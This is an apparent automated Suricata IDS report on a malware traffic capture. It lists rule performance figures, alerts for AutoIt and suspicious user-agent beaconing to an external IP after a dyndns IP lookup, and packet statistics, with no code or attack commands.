Filename: b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df17528236e3b6b.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 23.0604419708 seconds
Hash: 04c847a258b82858fa76434ef9233177
Uploaded: 1564034233

Logfiles


suricata-4.0.0-etpro-all-perf.txt-2019-07-25-T-05-57-36-07252019.0557-b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df17528236e3b6b.pcap.txt - (29270 bytes)
  --------------------------------------------------------------------------
  Date: 7/25/2019 -- 05:57:36. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2806132      1        3        6484730      1.52   52       0        4010922     124706.35   0.00        124706.35  
  2        2809511      1        4        6066778      1.42   104      0        588558      58334.40    0.00        58334.40   
  3        2805348      1        4        1554596      0.36   13       0        514142      119584.31   0.00        119584.31  
  4        2807970      1        8        6763204      1.58   104      0        355064      65030.81    0.00        65030.81   
  5        2826256      1        2        3983108      0.93   105      0        295552      37934.36    0.00        37934.36   
  6        2803740      1        4        3264342      0.76   53       0        247724      61591.36    0.00        61591.36   
  7        2809363      1        3        6639666      1.55   104      0        175520      63842.94    0.00        63842.94   
  8        2810276      1        6        9205514      2.16   104      0        170686      88514.56    0.00        88514.56   
  9        2020370      1        4        157180       0.04   1        0        157180      157180.00   0.00        157180.00  
  10       2821569      1        7        5503666      1.29   104      0        152110      52919.87    0.00        52919.87   
  11       2819993      1        2        4149202      0.97   52       0        152046      79792.35    0.00        79792.35   
  12       2810152      1        2        4195062      0.98   53       0        148868      79152.11    0.00        79152.11   
  13       2809715      1        2        3690426      0.86   53       0        148752      69630.68    0.00        69630.68   
  14       2812433      1        2        5454602      1.28   104      0        147054      52448.10    0.00        52448.10   
  15       2815340      1        2        3709692      0.87   53       0        146006      69994.19    0.00        69994.19   
  16       2830346      1        2        3204590      0.75   53       0        142736      60463.96    0.00        60463.96   
  17       2814883      1        3        3799486      0.89   52       0        142524      73067.04    0.00        73067.04   
  18       2815364      1        2        5539064      1.30   104      0        140718      53260.23    0.00        53260.23   
  19       2017261      1        3        6489840      1.52   104      0        134874      62402.31    0.00        62402.31   
  20       2830122      1        2        2651386      0.62   53       0        127226      50026.15    0.00        50026.15   
  21       2017259      1        12       4253056      1.00   52       0        126310      81789.54    0.00        81789.54   
  22       2810991      1        4        4136144      0.97   52       0        123368      79541.23    0.00        79541.23   
  23       2823858      1        3        5337982      1.25   104      0        121158      51326.75    0.00        51326.75   
  24       2829644      1        1        2551940      0.60   52       0        120958      49075.77    0.00        49075.77   
  25       2828986      1        2        6078532      1.42   105      0        113810      57890.78    0.00        57890.78   
  26       2827279      1        5        7137380      1.67   105      0        113344      67975.05    0.00        67975.05   
  27       2829848      1        2        6010498      1.41   105      0        112348      57242.84    0.00        57242.84   
  28       2816356      1        2        3122240      0.73   52       0        111796      60043.08    0.00        60043.08   
  29       2019935      1        3        2569564      0.60   53       0        110620      48482.34    0.00        48482.34   
  30       2816165      1        5        4877748      1.14   105      0        110136      46454.74    0.00        46454.74   
  31       2810148      1        2        4189882      0.98   53       0        108238      79054.38    0.00        79054.38   
  32       2819850      1        2        4153642      0.97   53       0        107302      78370.60    0.00        78370.60   
  33       2804610      1        2        2557864      0.60   53       0        104890      48261.58    0.00        48261.58   
  34       2825675      1        3        4102708      0.96   53       0        103640      77409.58    0.00        77409.58   
  35       2022901      1        2        6380834      1.49   104      0        102506      61354.17    0.00        61354.17   
  36       2828008      1        2        6816926      1.60   105      0        101250      64923.10    0.00        64923.10   
  37       2021418      1        9        6366392      1.49   104      0        100976      61215.31    0.00        61215.31   
  38       2821561      1        2        4049158      0.95   52       0        99978       77868.42    0.00        77868.42   
  39       2019094      1        5        6541990      1.53   104      0        98728       62903.75    0.00        62903.75   
  40       2821471      1        2        6386604      1.50   104      0        97810       61409.65    0.00        61409.65   
  41       2814061      1        2        3660842      0.86   53       0        96484       69072.49    0.00        69072.49   
  42       2815568      1        2        5263034      1.23   104      0        91218       50606.10    0.00        50606.10   
  43       2021413      1        2        6355504      1.49   104      0        89840       61110.62    0.00        61110.62   
  44       2819671      1        3        3029502      0.71   53       0        89308       57160.42    0.00        57160.42   
  45       2809677      1        2        3042718      0.71   53       0        88350       57409.77    0.00        57409.77   
  46       2008350      1        7        2805124      0.66   53       53       87432       52926.87    52926.87    0.00       
  47       2827883      1        2        3066172      0.72   52       0        86886       58964.85    0.00        58964.85   
  48       2815033      1        2        2000086      0.47   52       0        85488       38463.19    0.00        38463.19   
  49       2826615      1        2        3017792      0.71   53       0        85332       56939.47    0.00        56939.47   
  50       2001891      1        19       2518090      0.59   52       52       85258       48424.81    48424.81    0.00       
  51       2020181      1        8        5306976      1.24   104      0        85236       51028.62    0.00        51028.62   
  52       2805801      1        2        3066296      0.72   53       0        85094       57854.64    0.00        57854.64   
  53       2015877      1        6        4843478      1.13   104      0        84032       46571.90    0.00        46571.90   
  54       2025162      1        2        2551936      0.60   52       0        82420       49075.69    0.00        49075.69   
  55       2807793      1        4        4715748      1.10   104      0        81654       45343.73    0.00        45343.73   
  56       2811669      1        2        3441354      0.81   53       0        81446       64931.21    0.00        64931.21   
  57       2820517      1        2        2603070      0.61   53       0        80356       49114.53    0.00        49114.53   
  58       2830124      1        1        3038256      0.71   52       0        79804       58428.00    0.00        58428.00   
  59       2014405      1        10       5030176      1.18   104      0        79602       48367.08    0.00        48367.08   
  60       2828060      1        4        5011222      1.17   105      0        78816       47725.92    0.00        47725.92   
  61       2828314      1        4        2459784      0.58   52       0        78348       47303.54    0.00        47303.54   
  62       2016411      1        3        2940370      0.69   52       0        78342       56545.58    0.00        56545.58   
  63       2012649      1        5        4846504      1.13   104      0        78242       46601.00    0.00        46601.00   
  64       2823166      1        3        4786028      1.12   105      0        76898       45581.22    0.00        45581.22   
  65       2814622      1        2        2523564      0.59   53       0        75132       47614.42    0.00        47614.42   
  66       2016537      1        2        1312150      0.31   53       0        74844       24757.55    0.00        24757.55   
  67       2816055      1        2        2507210      0.59   52       0        74178       48215.58    0.00        48215.58   
  68       2809267      1        8        1927878      0.45   52       0        73900       37074.58    0.00        37074.58   
  69       2828876      1        1        1153960      0.27   210      0        73710       5495.05     0.00        5495.05    
  70       2825067      1        2        2482312      0.58   52       0        72890       47736.77    0.00        47736.77   
  71       2827580      1        7        2440980      0.57   52       0        70852       46941.92    0.00        46941.92   
  72       2012612      1        16       2517876      0.59   53       0        70800       47507.09    0.00        47507.09   
  73       2021038      1        4        2532296      0.59   52       0        70134       48698.00    0.00        48698.00   
  74       2828198      1        2        1887812      0.44   52       0        70036       36304.08    0.00        36304.08   
  75       2017948      1        2        5188750      1.22   104      0        69936       49891.83    0.00        49891.83   
  76       2017552      1        6        4878176      1.14   158      0        69860       30874.53    0.00        30874.53   
  77       2810919      1        2        2616602      0.61   53       0        69702       49369.85    0.00        49369.85   
  78       2014967      1        3        3636074      0.85   104      0        69132       34962.25    0.00        34962.25   
  79       2826203      1        2        2483238      0.58   53       0        68742       46853.55    0.00        46853.55   
  80       2830267      1        2        2525826      0.59   53       0        68206       47657.09    0.00        47657.09   
  81       2822601      1        4        1919120      0.45   52       0        67500       36906.15    0.00        36906.15   
  82       2806883      1        7        2476586      0.58   53       0        67442       46728.04    0.00        46728.04   
  83       2806414      1        5        2459276      0.58   52       0        66992       47293.77    0.00        47293.77   
  84       2804272      1        3        2519530      0.59   53       0        66098       47538.30    0.00        47538.30   
  85       2806659      1        4        65708        0.02   1        0        65708       65708.00    0.00        65708.00   
  86       2819823      1        5        2043930      0.48   52       0        64770       39306.35    0.00        39306.35   
  87       2802876      1        3        1941454      0.45   105      0        64576       18490.04    0.00        18490.04   
  88       2821615      1        2        2429990      0.57   52       0        64342       46730.58    0.00        46730.58   
  89       2023481      1        2        1967216      0.46   52       0        64228       37831.08    0.00        37831.08   
  90       2822109      1        2        1871394      0.44   52       0        64218       35988.35    0.00        35988.35   
  91       2020886      1        4        63900        0.01   1        0        63900       63900.00    0.00        63900.00   
  92       2804995      1        2        2392578      0.56   53       0        63876       45142.98    0.00        45142.98   
  93       2816899      1        2        3679272      0.86   104      0        61944       35377.62    0.00        35377.62   
  94       2025180      1        1        1809116      0.42   52       0        61000       34790.69    0.00        34790.69   
  95       2827168      1        3        1956340      0.46   52       0        60796       37621.92    0.00        37621.92   
  96       2830035      1        2        1910818      0.45   52       0        60288       36746.50    0.00        36746.50   
  97       2014380      1        4        3200074      0.75   104      0        60072       30769.94    0.00        30769.94   
  98       2024513      1        5        1638666      0.38   105      0        59198       15606.34    0.00        15606.34   
  99       2828166      1        2        1897250      0.44   52       0        58982       36485.58    0.00        36485.58   
  100      2828212      1        2        1916204      0.45   52       0        58956       36850.08    0.00        36850.08   
  101      2824398      1        2        1889332      0.44   52       0        58612       36333.31    0.00        36333.31   
  102      2829607      1        1        1903854      0.45   52       0        57970       36612.58    0.00        36612.58   
  103      2820809      1        2        1849422      0.43   52       0        57726       35565.81    0.00        35565.81   
  104      2016706      1        20       3595282      0.84   104      0        56840       34570.02    0.00        34570.02   
  105      2009702      1        5        199932       0.05   8        0        56422       24991.50    0.00        24991.50   
  106      2022973      1        1        56328        0.01   1        0        56328       56328.00    0.00        56328.00   
  107      2819785      1        2        1896430      0.44   52       0        55646       36469.81    0.00        36469.81   
  108      2803902      1        3        1962320      0.46   52       0        55192       37736.92    0.00        37736.92   
  109      2824808      1        2        1830684      0.43   52       0        55102       35205.46    0.00        35205.46   
  110      2024606      1        2        3531446      0.83   104      0        54840       33956.21    0.00        33956.21   
  111      2016809      1        5        3515440      0.82   104      0        54584       33802.31    0.00        33802.31   
  112      2823488      1        2        1848654      0.43   52       0        54482       35551.04    0.00        35551.04   
  113      2816669      1        4        1868398      0.44   52       0        54378       35930.73    0.00        35930.73   
  114      2815824      1        2        1589640      0.37   104      0        54278       15285.00    0.00        15285.00   
  115      2022502      1        4        1876926      0.44   52       0        53830       36094.73    0.00        36094.73   
  116      2024573      1        2        1823160      0.43   52       0        53770       35060.77    0.00        35060.77   
  117      2020937      1        2        1800364      0.42   52       0        51640       34622.38    0.00        34622.38   
  118      2820696      1        2        1845084      0.43   52       0        50996       35482.38    0.00        35482.38   
  119      2024771      1        1        45958        0.01   1        0        45958       45958.00    0.00        45958.00   
  120      2012328      1        6        93472        0.02   4        0        45220       23368.00    0.00        23368.00   
  121      2823937      1        13       1524416      0.36   105      0        44944       14518.25    0.00        14518.25   
  122      2013097      1        8        44766        0.01   1        0        44766       44766.00    0.00        44766.00   
  123      2014363      1        7        90080        0.02   4        0        44714       22520.00    0.00        22520.00   
  124      2014091      1        3        44672        0.01   1        0        44672       44672.00    0.00        44672.00   
  125      2021584      1        4        5

This file has been truncated.


suricata-4.0.0-etpro-all-alert-2019-07-25-T-05-57-36-07252019.0557-b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df17528236e3b6b.pcap.txt - (22759 bytes)
13.138205  [**] [1:2012758:5] ET INFO DYNAMIC_DNS Query to *.dyndns. Domain [**] [Classification: Misc activity] [Priority: 3] {UDP} 10.0.2.15:1031 -> 10.0.2.2:53
13.314552  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1049 -> 162.88.100.200:80
13.314552  [**] [1:2021378:3] ET POLICY External IP Lookup - checkip.dyndns.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1049 -> 162.88.100.200:80
13.314748  [**] [1:2014932:2] ET POLICY DynDNS CheckIp External IP Address Server Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 162.88.100.200:80 -> 10.0.2.15:1049
13.412598  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1050 -> 77.222.40.79:80
14.620642  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1052 -> 77.222.40.79:80
14.646940  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
15.770291  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1053 -> 77.222.40.79:80
15.849267  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
16.920778  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1054 -> 77.222.40.79:80
16.950426  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
18.071608  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1055 -> 77.222.40.79:80
18.152307  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
19.213534  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1056 -> 77.222.40.79:80
19.253791  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
20.367132  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1057 -> 77.222.40.79:80
20.455995  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
21.516866  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1058 -> 77.222.40.79:80
21.557473  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
22.659739  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1059 -> 77.222.40.79:80
22.759212  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
23.812362  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1060 -> 77.222.40.79:80
23.860907  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
24.961364  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1061 -> 77.222.40.79:80
25.062181  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
26.104873  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1062 -> 77.222.40.79:80
26.163529  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
27.256896  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1063 -> 77.222.40.79:80
27.265093  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
28.407360  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1064 -> 77.222.40.79:80
28.467372  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
29.559730  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1065 -> 77.222.40.79:80
29.568936  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
30.710893  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1066 -> 77.222.40.79:80
30.770551  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
31.864355  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1067 -> 77.222.40.79:80
31.872231  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
33.015830  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1068 -> 77.222.40.79:80
33.073690  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
34.164602  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1069 -> 77.222.40.79:80
34.175285  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
35.307770  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1070 -> 77.222.40.79:80
35.377315  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
36.459809  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1071 -> 77.222.40.79:80
36.478401  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
37.612759  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1072 -> 77.222.40.79:80
37.680441  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
38.764272  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1073 -> 77.222.40.79:80
38.781995  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
39.914777  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1074 -> 77.222.40.79:80
39.983562  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
41.067883  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1075 -> 77.222.40.79:80
41.085153  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
42.217641  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1076 -> 77.222.40.79:80
42.287264  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
43.371625  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1077 -> 77.222.40.79:80
43.388387  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
44.521089  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1078 -> 77.222.40.79:80
44.590004  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
45.671105  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1079 -> 77.222.40.79:80
45.692183  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
46.815588  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1080 -> 77.222.40.79:80
46.893674  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
47.967751  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1081 -> 77.222.40.79:80
47.995188  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
49.117475  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1082 -> 77.222.40.79:80
49.197159  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
50.269818  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1083 -> 77.222.40.79:80
50.298744  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
51.423950  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1084 -> 77.222.40.79:80
51.500352  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
52.568171  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1085 -> 77.222.40.79:80
52.601664  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
53.712065  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1086 -> 77.222.40.79:80
53.803786  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
54.854062  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1087 -> 77.222.40.79:80
54.905307  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
55.993549  [**] [1:2008350:7] ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.2.15:1088 -> 77.222.40.79:80
56.007083  [**] [1:2001891:19] ET USER_AGENTS Suspicious User Agent (agent) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1051 -> 77.222.40.79:80
57.137112

This file has been truncated.


packet_stats.log - (16402 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       1            37         21316958      673887896     244974385          9.1b    3.64
 IPv4       2             2         11215996       21440080      16328038         32.7m    0.01
 IPv4       6           639          8651422      722274612     360489175        230.4b   92.40
 IPv4      17            54          9169316      673756988     182189219          9.8b    3.95
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       1            37           114768         214060        130380          4.8m    0.61
TMM_FLOWWORKER              IPv4       2             2           138876         141826        140351        280.7k    0.04
TMM_FLOWWORKER              IPv4       6           639           114862       23931778       1175304        751.0m   94.33
TMM_FLOWWORKER              IPv4      17            54           268978        7643808        619470         33.5m    4.20
TMM_RECEIVEPCAPFILE         IPv4       1            37             4434           5510          4660        172.4k    0.02
TMM_RECEIVEPCAPFILE         IPv4       2             2             4730           4734          4732          9.5k    0.00
TMM_RECEIVEPCAPFILE         IPv4       6           585             4422          24888          4836          2.8m    0.36
TMM_RECEIVEPCAPFILE         IPv4      17            54             4450           6262          4785        258.4k    0.03
TMM_DECODEPCAPFILE          IPv4       1            37             4608          19840          5311        196.5k    0.02
TMM_DECODEPCAPFILE          IPv4       2             2             4762           5744          5253         10.5k    0.00
TMM_DECODEPCAPFILE          IPv4       6           585             4550          18954          4866          2.8m    0.36
TMM_DECODEPCAPFILE          IPv4      17            54             4594          27992          5292        285.8k    0.04

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       1            37             4858           7220          5434        201.1k  0.03  
